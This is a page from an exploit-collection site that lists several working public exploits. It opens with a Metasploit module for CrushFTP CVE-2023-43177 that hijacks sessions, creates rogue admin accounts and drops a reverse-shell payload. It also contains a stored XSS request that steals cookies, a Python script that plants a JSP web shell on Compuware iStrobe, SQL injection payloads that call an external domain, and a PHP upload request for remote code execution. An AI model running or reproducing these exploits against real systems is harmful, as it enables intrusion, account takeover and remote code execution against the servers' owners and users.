Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::Remote::Java::HTTP::ClassLoader prepend Msf::Exploit::Remote::AutoCheck class CrushFtpError < StandardError; end class CrushFtpNoAccessError < CrushFtpError; end class CrushFtpNotFoundError < CrushFtpError; end class CrushFtpUnknown < CrushFtpError; end def initialize(info = {}) super( update_info( info, 'Name' => 'CrushFTP Unauthenticated RCE', 'Description' => %q{ This exploit module leverages an Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution. This affects CrushFTP versions prior to 10.5.1. It is possible to set some user's session properties by sending an HTTP request with specially crafted Header key-value pairs. This enables an unauthenticated attacker to access files anywhere on the server file system and steal the session cookies of valid authenticated users. The attack consists in hijacking a user's session and escalates privileges to obtain full control of the target. Remote code execution is obtained by abusing the dynamic SQL driver loading and configuration testing feature. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ryan Emmons', # Initial research, discovery and PoC 'Christophe De La Fuente' # Metasploit module ], 'References' => [ [ 'URL', 'https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/'], [ 'URL', 'https://github.com/the-emmons/CVE-2023-43177/blob/main/CVE-2023-43177.py'], [ 'URL', 'https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update'], [ 'CVE', '2023-43177'], [ 'CWE', '913' ] ], 'Platform' => %w[java unix linux win], 'Privileged' => true, 'Arch' => [ARCH_JAVA, ARCH_X64, ARCH_X86], 'Targets' => [ [ 'Java', { 'Arch' => ARCH_JAVA, 'Platform' => 'java', # If not set here, Framework will pick this payload anyway and set the default LHOST to the local interface. # If we set the payload manually to a bind payload (e.g. `java/meterpreter/bind_tcp`) the default LHOST will be # used and the payload will fail if the target is not local (most likely). # To avoid this, the default payload is set here, which prevent Framework to set a default LHOST. 'DefaultOptions' => { 'PAYLOAD' => 'java/meterpreter/reverse_tcp' } } ], [ 'Linux Dropper', { 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'linux' } ], [ 'Windows Dropper', { 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'win' } ], ], 'DisclosureDate' => '2023-08-08', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'The base path of the CrushFTP web interface', '/']), OptInt.new('SESSION_FILE_DELAY', [true, 'The delay in seconds between attempts to download the session file', 30]) ] ) end def send_as2_query_api(headers = {}) rand_username = rand_text_hex(10) opts = { 'uri' => normalize_uri(target_uri.path, 'WebInterface/function/?command=getUsername'), 'method' => 'POST', 'headers' => { 'as2-to' => rand_text_hex(8), # Each key-value pair will be added into the current session’s # `user_info` Properties, which is used by CrushFTP to store information # about a user's session. Here, we set a few properties needed for the # exploit to work. 'user_ip' => '127.0.0.1', 'dont_log' => 'true', # The `user_name` property will be be included in the response to a # `getUsername` API query. This will be used to make sure the operation # worked and the other key-value pairs were added to the session's # `user_info` Properties. 'user_name' => rand_username }.merge(headers) } # This only works with anonymous sessions, so `#get_anon_session` should be # called before to make sure the cookie_jar is set with an anonymous # session cookie. res = send_request_cgi(opts) raise CrushFtpNoAccessError, '[send_as2_query_api] Could not connect to the web server - no response' if res.nil? xml_response = res.get_xml_document if xml_response.xpath('//loginResult/response').text != 'success' raise CrushFtpUnknown, '[send_as2_query_api] The API returned a non-successful response' end # Checking the forged username returned in the response unless xml_response.xpath('//loginResult/username').text == rand_username raise CrushFtpUnknown, '[send_as2_query_api] username not found in response, the exploit didn\'t work' end res end def send_query_api(command:, cookie: nil, vars: {}, multipart: false, timeout: 20) opts = { 'uri' => normalize_uri(target_uri.path, 'WebInterface/function/'), 'method' => 'POST' } if multipart opts['vars_form_data'] = [ { 'name' => 'command', 'data' => command }, ] unless cookie.blank? opts['vars_form_data'] << { 'name' => 'c2f', 'data' => cookie.last(4) } end opts['vars_form_data'] += vars unless vars.empty? else opts['vars_post'] = { 'command' => command }.merge(vars) opts['vars_post']['c2f'] = cookie.last(4) unless cookie.blank? end opts['cookie'] = "CrushAuth=#{cookie}; currentAuth=#{cookie.last(4)}" unless cookie.nil? res = send_request_cgi(opts, timeout) raise CrushFtpNoAccessError, '[send_query_api] Could not connect to the web server - no response' if res.nil? res end def get_anon_session vprint_status('Getting a new anonymous session') cookie_jar.clear res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'WebInterface'), 'method' => 'GET', 'keep_cookies' => true ) raise CrushFtpNoAccessError, '[get_anon_session] Could not connect to the web server - no response' if res.nil? match = res.get_cookies.match(/CrushAuth=(?<cookie>\d{13}_[A-Za-z0-9]{30})/) raise CrushFtpNotFoundError, '[get_anon_session] Could not get the `currentAuth` cookie' unless match vprint_status("Anonymous session cookie: #{match[:cookie]}") match[:cookie] end def check vprint_status('Checking CrushFTP Server') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'WebInterface', 'login.html'), 'method' => 'GET' ) return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil? return CheckCode::Safe('The web server is not running CrushFTP') unless res.body =~ /crushftp/i cookie = get_anon_session vprint_status('Checking if the attack primitive works') # This will raise an exception in case of error send_as2_query_api do_logout(cookie) CheckCode::Appears rescue CrushFtpError => e CheckCode::Unknown("#{e.class} - #{e.message}") end def rand_dir @rand_dir ||= "WebInterface/Resources/libs/jq-3.6.0_#{rand_text_hex(10)}-js/" end def get_session_file # Setting this here to be reachable by the ensure block cookie = nil begin cookie = get_anon_session rescue CrushFtpError => e print_bad("[get_session_file] Unable to get an anonymous session: #{e.class} - #{e.message}") return nil end vprint_status("Getting session file at `#{rand_dir}`") headers = { 'filename' => '/', 'user_protocol_proxy' => rand_text_hex(8), 'user_log_file' => 'sessions.obj', 'user_log_path' => './', 'user_log_path_custom' => File.join('.', rand_dir) } send_as2_query_api(headers) formatted_dir = File.join('.', rand_dir.delete_suffix('/')) register_dirs_for_cleanup(formatted_dir) unless @dropped_dirs.include?(formatted_dir) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, rand_dir, 'sessions.obj'), 'method' => 'GET' ) unless res&.code == 200 print_bad('[get_session_file] Could not connect to the web server - no response') if res.nil? print_bad('[get_session_file] Could not steal the session file') return nil end print_good('Session file downloaded') tmp_hash = Rex::Text.md5(res.body) if @session_file_hash == tmp_hash vprint_status('Session file has not changed yet, skipping') return nil end @session_file_hash = tmp_hash res.body rescue CrushFtpError => e print_bad("[get_session_file] Unknown failure:#{e.class} - #{e.message}") return nil ensure do_logout(cookie) if cookie end def check_sessions(session_file) valid_sessions = [] session_cookies = session_file.scan(/\d{13}_[A-Za-z0-9]{30}/).uniq vprint_status("Found #{session_cookies.size} session cookies in the session file") session_cookies.each do |cookie| res = send_query_api(command: 'getUsername', cookie: cookie) username = res.get_xml_document.xpath('//loginResult/username').text if username == 'anonymous' vprint_status("Cookie `#{cookie}` is an anonymous session") elsif username.empty? vprint_status("Cookie `#{cookie}` is not valid") else vprint_status("Cookie `#{cookie}` is valid session (username: #{username})") valid_sessions << { cookie: cookie, username: username } end rescue CrushFtpError => e print_bad("[check_sessions] Error while checking cookie `#{cookie}`: #{e.class} - #{e.message}") end valid_sessions end def check_admin_and_windows(cookie) res = send_query_api(command: 'getDashboardItems', cookie: cookie) is_windows = res.get_xml_document.xpath('//result/response_data/result_value/machine_is_windows').text return nil if is_windows.blank? return true if is_windows == 'true' false rescue CrushFtpError vprint_status("[check_admin_and_get_os_family] Cookie #{cookie} doesn't have access to the `getDashboardItems` API, it is not an admin session") nil end def get_writable_dir(path, cookie) res = send_query_api(command: 'getXMLListing', cookie: cookie, vars: { 'path' => path, 'random' => "0.#{rand_text_numeric(17)}" }) xml_doc = res.get_xml_document current_path = xml_doc.xpath('//listingInfo/path').text if xml_doc.xpath('//listingInfo/privs').text.include?('(write)') return current_path end res.get_xml_document.xpath('//listingInfo/listing/listing_subitem').each do |subitem| if subitem.at('type').text == 'DIR' dir = get_writable_dir(File.join(current_path, subitem.at('href_path').text), cookie) return dir unless dir.nil? end end nil rescue CrushFtpError => e print_bad("[get_writable_dir] Unknown failure: #{e.class} - #{e.message}") nil end def upload_file(file_path, file_content, id, cookie) file_size = file_content.size vars = [ { 'name' => 'upload_path', 'data' => file_path }, { 'name' => 'upload_size', 'data' => file_size }, { 'name' => 'upload_id', 'data' => id }, { 'name' => 'start_resume_loc', 'data' => '0' } ] res = send_query_api(command: 'openFile', cookie: cookie, vars: vars, multipart: true) response_msg = res.get_xml_document.xpath('//commandResult/response').text if response_msg != id raise CrushFtpUnknown, "Unable to upload #{file_path}: #{response_msg}" end form_data = Rex::MIME::Message.new form_data.add_part(file_content, 'application/octet-stream', 'binary', "form-data; name=\"CFCD\"; filename=\"#{file_path}\"") post_data = form_data.to_s post_data.sub!("Content-Transfer-Encoding: binary\r\n", '') send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'U', "#{id}~1~#{file_size}"), 'method' => 'POST', 'cookie' => "CrushAuth=#{cookie}; currentAuth=#{cookie.last(4)}", 'ctype' => "multipart/form-data; boundary=#{form_data.bound}", 'data' => post_data ) vars = [ { 'name' => 'upload_id', 'data' => id }, { 'name' => 'total_chunks', 'data' => '1' }, { 'name' => 'total_bytes', 'data' => file_size }, { 'name' => 'filePath', 'data' => file_path }, { 'name' => 'lastModified', 'data' => DateTime.now.strftime('%Q') }, { 'name' => 'start_resume_loc', 'data' => '0' } ] send_query_api(command: 'closeFile', cookie: cookie, vars: vars, multipart: true) end def check_egg(session_file, egg) path = session_file.match(%r{FILE://.*?#{egg}}) return nil unless path path = path[0] vprint_status("Found the egg at #{path} in the session file") if (match = path.match(%r{^FILE://(?<path>[A-Z]:.*)#{egg}})) print_good("Found path `#{match[:path]}` and it is Windows") elsif (match = path.match(%r{^FILE:/(?<path>.*)#{egg}})) print_good("Found path `#{match[:path]}` and it is Unix-like") end match[:path] end def move_user_xml(admin_username, writable_dir) headers = { 'filename' => '/', 'user_protocol_proxy' => rand_text_hex(8), 'user_log_file' => 'user.XML', 'user_log_path' => "./../../../../../../../../../../../../../../..#{writable_dir}", 'user_log_path_custom' => "./users/MainUsers/#{admin_username}/" } send_as2_query_api(headers) end def do_priv_esc_and_check_windows(session) vprint_status('Looking for a directory with write permissions') writable_dir = get_writable_dir('/', session[:cookie]) if writable_dir.nil? print_bad('[do_priv_esc_and_check_windows] The user has no upload permissions, privilege escalation is not possible') return nil end print_good("Found a writable directory: #{writable_dir}") egg_rand = rand_text_hex(10) print_status("Uploading the egg file `#{egg_rand}`") egg_path = File.join(writable_dir, egg_rand) begin upload_file(egg_path, rand_text_hex(3..6), egg_rand, session[:cookie]) rescue CrushFtpError => e print_bad("[do_priv_esc_and_check_windows] Unable to upload the egg file: #{e.class} - #{e.message}") return nil end admin_password = rand_text_hex(10) user_xml = <<~XML.gsub!(/\n */, '') <?xml version='1.0' encoding='UTF-8'?> <user type='properties'> <username>#{session[:username]}</username> <password>MD5:#{Rex::Text.md5(admin_password)}</password> <extra_vfs type='vector'></extra_vfs> <version>1.0</version> <userVersion>6</userVersion> <created_by_username>crushadmin</created_by_username> <created_by_email></created_by_email> <created_time>#{DateTime.now.strftime('%Q')}</created_time> <filePublicEncryptionKey></filePublicEncryptionKey> <fileDecryptionKey></fileDecryptionKey> <max_logins>0</max_logins> <root_dir>/</root_dir> <site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site> <password_history></password_history> </user> XML xml_path = File.join(writable_dir, 'user.XML') print_status("Uploading `user.XML` to #{xml_path}") begin upload_file(xml_path, user_xml, rand_text_hex(10), session[:cookie]) rescue CrushFtpError => e print_bad("[do_priv_esc_and_check_windows] Unable to upload `user.XML`: #{e.class} - #{e.message}") return nil end path = nil loop do print_status('Looking for the egg in the session file') session_file = get_session_file if session_file path = check_egg(session_file, egg_rand) break if path end print_status("Egg not found, wait #{datastore['SESSION_FILE_DELAY']} seconds and try again... (Ctrl-C to exit)") sleep datastore['SESSION_FILE_DELAY'] end print_good("Found the file system path: #{path}") register_files_for_cleanup(File.join(path, egg_rand)) cookie = nil begin cookie = get_anon_session rescue CrushFtpError => e print_bad("[do_priv_esc_and_check_windows] Unable to get an anonymous session: #{e.class} - #{e.message}") return nil end admin_username = rand_text_hex(10) vprint_status("The forged user will be `#{admin_username}`") vprint_status("Moving user.XML from #{path} to `#{admin_username}` home folder and elevate privileges") is_windows = path.match(/^[A-Z]:(?<path>.*)/) move_user_xml(admin_username, is_windows ? Regexp.last_match(:path) : path) do_logout(cookie) # `cookie` is explicitly set to `nil` here to make sure the ensure block # won't log it out again if the next call to `do_login` raises an # exception. Without this line, if `do_login` raises an exception, `cookie` # will still contain the value of the previous session cookie, which should # have been logged out at this point. The ensure block will try to logout # the same session again. cookie = nil print_status('Logging into the elevated account') cookie = do_login(admin_username, admin_password) fail_with(Failure::NoAccess, 'Unable to login with the elevated account') unless cookie print_good('Logged in! Now let\'s create a temporary admin account') [create_admin_account(cookie, is_windows), is_windows] ensure do_logout(cookie) if cookie end def create_admin_account(cookie, is_windows) # This creates an administrator account with the required VFS setting for the exploit to work admin_username = rand_text_hex(10) admin_password = rand_text_hex(10) user_xml = <<~XML.gsub!(/\n */, '') <?xml version='1.0' encoding='UTF-8'?> <user type='properties'> <username>#{admin_username}</username> <password>#{admin_password}</password> <extra_vfs type='vector'></extra_vfs> <version>1.0</version> <userVersion>6</userVersion> <created_by_username>crushadmin</created_by_username> <created_by_email></created_by_email> <created_time>#{DateTime.now.strftime('%Q')}</created_time> <filePublicEncryptionKey></filePublicEncryptionKey> <fileDecryptionKey></fileDecryptionKey> <max_logins>0</max_logins> <root_dir>/</root_dir> <site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site> <password_history></password_history> </user> XML url = is_windows ? 'FILE://C:/Users/Public/' : 'FILE://var/tmp/' vfs_xml = <<~XML.gsub!(/\n */, '') <?xml version='1.0' encoding='UTF-8'?> <vfs_items type='vector'> <vfs_items_subitem type='properties'> <name>tmp</name> <path>/</path> <vfs_item type='vector'> <vfs_item_subitem type='properties'> <type>DIR</type> <url>#{url}</url> </vfs_item_subitem> </vfs_item> </vfs_items_subitem> </vfs_items> XML perms_xml = <<~XML.gsub!(/\n */, '') <?xml version='1.0' encoding='UTF-8'?> <VFS type='properties'> <item name='/'> (read)(view)(resume) </item> <item name='/TMP/'> (read)(write)(view)(delete)(deletedir)(makedir)(rename)(resume)(share)(slideshow) </item> </VFS> XML vars_post = { 'data_action' => 'new', 'serverGroup' => 'MainUsers', 'username' => admin_username, 'user' => user_xml, 'xmlItem' => 'user', 'vfs_items' => vfs_xml, 'permissions' => perms_xml } res = send_query_api(command: 'setUserItem', cookie: cookie, vars: vars_post) return nil if res.body.include?('Access Denied') || res.code == 404 { username: admin_username, password: admin_password } rescue CrushFtpError => e print_bad("[create_admin_account] Unknown failure: #{e.class} - #{e.message}") nil end def do_login(username, password) vprint_status("[do_login] Logging in with username `#{username}` and password `#{password}`") vars = { 'username' => username, 'password' => password, 'encoded' => 'true', 'language' => 'en', 'random' => "0.#{rand_text_numeric(17)}" } res = send_query_api(command: 'login', cookie: '', vars: vars) unless res.code == 200 && res.get_xml_document.xpath('//loginResult/response').text.include?('success') print_bad('[do_login] Login failed') return nil end match = res.get_cookies.match(/CrushAuth=(?<cookie>\d{13}_[A-Za-z0-9]{30})/) unless match print_bad('[do_login] Cannot find session cookie in response') return nil end match[:cookie] end def do_logout(cookie) vprint_status("Logging out session cookie `#{cookie}`") vars = { 'random' => "0.#{rand_text_numeric(17)}" } res = send_query_api(command: 'logout', cookie: cookie, vars: vars) unless res.code == 200 && res.get_xml_document.xpath('//commandResult/response').text.include?('Logged out') vprint_bad('[do_logout] Unable to logout') end rescue CrushFtpError => e vprint_bad("[do_logout] An error occured when trying to logout: #{e.class} - #{e.message}") end def do_rce(cookie, is_windows) jar_file = payload.encoded_jar({ arch: payload.arch.first }) jar_file.add_file("#{class_name}.class", constructor_class) jar_filename = "#{rand_text_hex(4)}.jar" jar_path = is_windows ? "C:/Users/Public/#{jar_filename}" : "/var/tmp/#{jar_filename}" print_status("Uploading payload .jar file `#{jar_filename}` to #{jar_path}") begin upload_file(jar_filename, jar_file.pack, class_name, cookie) rescue CrushFtpError => e raise CrushFtpUnknown, "[do_rce] Unable to upload the payload .jar file: #{e.class} - #{e.message}" end print_status('Triggering the payload') vars = { 'db_driver_file' => jar_path, 'db_driver' => class_name, 'db_url' => 'jdbc:derby:./hax;create=true', 'db_user' => rand_text(3..5), 'db_pass' => rand_text(10..15) } begin send_query_api(command: 'testDB', cookie: cookie, vars: vars, timeout: 0) rescue CrushFtpNoAccessError # Expecting no response end register_files_for_cleanup(jar_path) end def delete_user(username, cookie) vars = { 'data_action' => 'delete', 'serverGroup' => 'MainUsers', 'usernames' => username, 'user' => '<?xml version="1.0" encoding="UTF-8"?>', 'xmlItem' => 'user', 'vfs_items' => '<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>', 'permissions' => '<?xml version="1.0" encoding="UTF-8"?><permissions type="vector"></permissions>' } send_query_api(command: 'setUserItem', cookie: cookie, vars: vars) end def exploit admin_creds = nil is_windows = nil loop do print_status('Downloading the session file') session_file = get_session_file unless session_file print_status("No session file, wait #{datastore['SESSION_FILE_DELAY']} seconds and try again... (Ctrl-C to exit)") sleep datastore['SESSION_FILE_DELAY'] next end print_status('Looking for the valid sessions') session_list = check_sessions(session_file) if session_list.empty? print_status("No valid sessions found, wait #{datastore['SESSION_FILE_DELAY']} seconds and try again... (Ctrl-C to exit)") sleep datastore['SESSION_FILE_DELAY'] next end # First, check if we have active admin sessions to go ahead and directly go the RCE part. session_list.each do |session| print_status("Checking if user #{session[:username]} is an admin (cookie: #{session[:cookie]})") # This will return nil if it is not an admin session is_windows = check_admin_and_windows(session[:cookie]) next if is_windows.nil? print_good('It is an admin! Let\'s create a temporary admin account') admin_creds = create_admin_account(session[:cookie], is_windows) break end # If the previous step failed, try to escalate privileges with the remaining active sessions, if any. if admin_creds.nil? print_status('Could not find any admin session or the admin account creation failed') session_list.each do |session| print_status("Attempting privilege escalation with session cookie #{session}") admin_creds, is_windows = do_priv_esc_and_check_windows(session) break unless admin_creds.nil? end end break unless admin_creds.nil? print_status( "Creation of an admin account failed with the current active sessions, wait #{datastore['SESSION_FILE_DELAY']}"\ 'seconds and try again... (Ctrl-C to exit)' ) sleep datastore['SESSION_FILE_DELAY'] end print_good("Administrator account created: username=#{admin_creds[:username]}, password=#{admin_creds[:password]}") cookie = do_login(admin_creds[:username], admin_creds[:password]) fail_with(Failure::NoAccess, 'Unable to login with the new administrator credentials') unless cookie do_rce(cookie, is_windows) print_status('Cleanup the temporary admin account') delete_user(admin_creds[:username], cookie) rescue CrushFtpError => e fail_with(Failure::Unknown, "Unknown failure: #{e.class} - #{e.message}") ensure do_logout(cookie) if cookie end end </code></pre>

<pre><code># Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS) # Date: 12 April 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.1.1 # Proof Of Concept: 1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]". # PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w # Vulnerable Property at Request: videoFields[post_type] # Payload: <script>alert(document.cookie)</script> # Request: POST /wp-admin/options.php HTTP/2 Host: erdemstar.local Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9 Content-Length: 395 Cache-Control: max-age=0 Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 Origin: https://erdemstar.local Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://erdemstar.local/wp-admin/admin.php?page=video_manager Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i option_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes </code></pre>

<pre><code>#!/usr/bin/env python3 # Exploit Title: Pre-auth RCE on Compuware iStrobe Web # Date: 01-08-2023 # Exploit Author: trancap # Vendor Homepage: https://www.bmc.com/ # Version: BMC Compuware iStrobe Web - 20.13 # Tested on: zOS# CVE : CVE-2023-40304 # To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files) # The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell (content of the webshell in the "topicText" parameter).# I contacted the vendor but he didn't consider this a vulnerability because of the Guest access needed. import requests import urllib.parse import argparse import sys def upload_web_shell(url): data = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"open","topicText":"<%@ page import=\"java.lang.*,java.io.*,java.util.*\" %><%Process p=Runtime.getRuntime().exec(request.getParameter(\"cmd\"));BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));String s=\"\";while((s=stdInput.readLine()) != null){out.println(s);};s=\"\";while((s=stdError.readLine()) != null){out.println(s);};%>","lang":"en","type":"MODULE","status":"PUB"} # If encoded, the web shell will not be uploaded properly data = urllib.parse.urlencode(data, safe='"*<>,=()/;{}!') # Checking if web shell already uploaded r = requests.get(f"{url}/istrobe/jsp/userhelp/ws.jsp", verify=False) if r.status_code != 404: return r = requests.post(f"{url}/istrobe/userHelp/saveUserHelp", data=data, verify=False) if r.status_code == 200: print(f"[+] Successfully uploaded web shell, it should be accessible at {url}/istrobe/jsp/userhelp/ws.jsp") else: sys.exit("[-] Something went wrong while uploading the web shell") def delete_web_shell(url): paramsPost = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"delete","lang":"en","type":"MODULE","status":"PUB"} response = session.post("http://220.4.147.38:6301/istrobe/userHelp/deleteUserHelp", data=paramsPost, headers=headers, cookies=cookies) if r.status_code == 200: print(f"[+] Successfully deleted web shell") else: sys.exit("[-] Something went wrong while deleting the web shell") def run_cmd(url, cmd): data = f"cmd={cmd}" r = requests.post(f"{url}/istrobe/jsp/userhelp/ws.jsp", data=data, verify=False) if r.status_code == 200: print(r.text) else: sys.exit(f'[-] Something went wrong while executing "{cmd}" command') parser = argparse.ArgumentParser(prog='exploit_cve_2023_40304.py', description='CVE-2023-40304 - Pre-auth file upload vulnerability + path traversal to achieve RCE') parser.add_argument('url', help='Vulnerable URL to target. Must be like http(s)://vuln.target') parser.add_argument('-c', '--cmd', help='Command to execute on the remote host (Defaults to "whoami")', default='whoami') parser.add_argument('--rm', help='Deletes the uploaded web shell', action='store_true') args = parser.parse_args() upload_web_shell(args.url) run_cmd(args.url, args.cmd) if args.rm: delete_web_shell(args.url) </code></pre>

<pre><code>## Title: kruxton-1.0-Multiple-SQLi ## Author: nu11secur1ty ## Date: 04/15/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The username parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+' was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=DKVEBDYC@burpcollaborator.net'+(select load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'' OR NOT 7810=7810 OR 'LaNe'='bRUy&password=v0N!p1j!S6 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: username=DKVEBDYC@burpcollaborator.net'+(select load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'' AND (SELECT 1998 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(1998=1998,1))),0x716b627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR 'jdui'='fNTo&password=v0N!p1j!S6 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=DKVEBDYC@burpcollaborator.net'+(select load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'' AND (SELECT 2923 FROM (SELECT(SLEEP(7)))UJBe) OR 'ffIk'='SAqf&password=v0N!p1j!S6 --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0/Multiple-SQLi) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/04/kruxton-10-multiple-sqli.html) ## Time spent: 01:15:00 </code></pre>

<pre><code>## Title: kruxton-1.0-FileUpload-RCE ## Author: nu11secur1ty ## Date: 04/15/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html ## Reference: https://portswigger.net/web-security/file-upload ## Description: The system setting with parameter IMG is vulnerable to File Upload vulnerability. The attacker can upload a very malicious PHP file into the server and then he can execute it This is a potential CRITICAL PROBLEM! STATUS: HIGH- Vulnerability [+]Payload: ```POST POST /kruxton/ajax.php?action=save_settings HTTP/1.1 Host: localpwnedhost.com Cookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq; PHPSESSID=lp21rf44drtnogjboa8v7lpmg1 Content-Length: 1043 Sec-Ch-Ua: "Chromium";v="123", "Not:A-Brand";v="8" Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUwsdkjlNQ5exBwrq X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://localpwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://localpwnedhost.com/kruxton/index.php?page=site_settings Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=1, i Connection: close ------WebKitFormBoundaryUwsdkjlNQ5exBwrq Content-Disposition: form-data; name="name" Kruxton Bristo By Mayuri K ------WebKitFormBoundaryUwsdkjlNQ5exBwrq Content-Disposition: form-data; name="email" mayuri.infospace@gmail.com ------WebKitFormBoundaryUwsdkjlNQ5exBwrq Content-Disposition: form-data; name="contact" 9000000000 ------WebKitFormBoundaryUwsdkjlNQ5exBwrq Content-Disposition: form-data; name="about" Kruxton Bristo By Mayuri Kcenter; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family: sans-serif;">Powered by <a href="https://www.froala.com/wysiwyg-editor?pb=1" title="Froala Editor">Froala Editor</a> ------WebKitFormBoundaryUwsdkjlNQ5exBwrq Content-Disposition: form-data; name="img"; filename="1nsi1deyou.php" Content-Type: application/octet-stream <?php // by nu11secur1ty - 2024 //Your malicious code here ?> ------WebKitFormBoundaryUwsdkjlNQ5exBwrq-- ``` ## Reproduce: 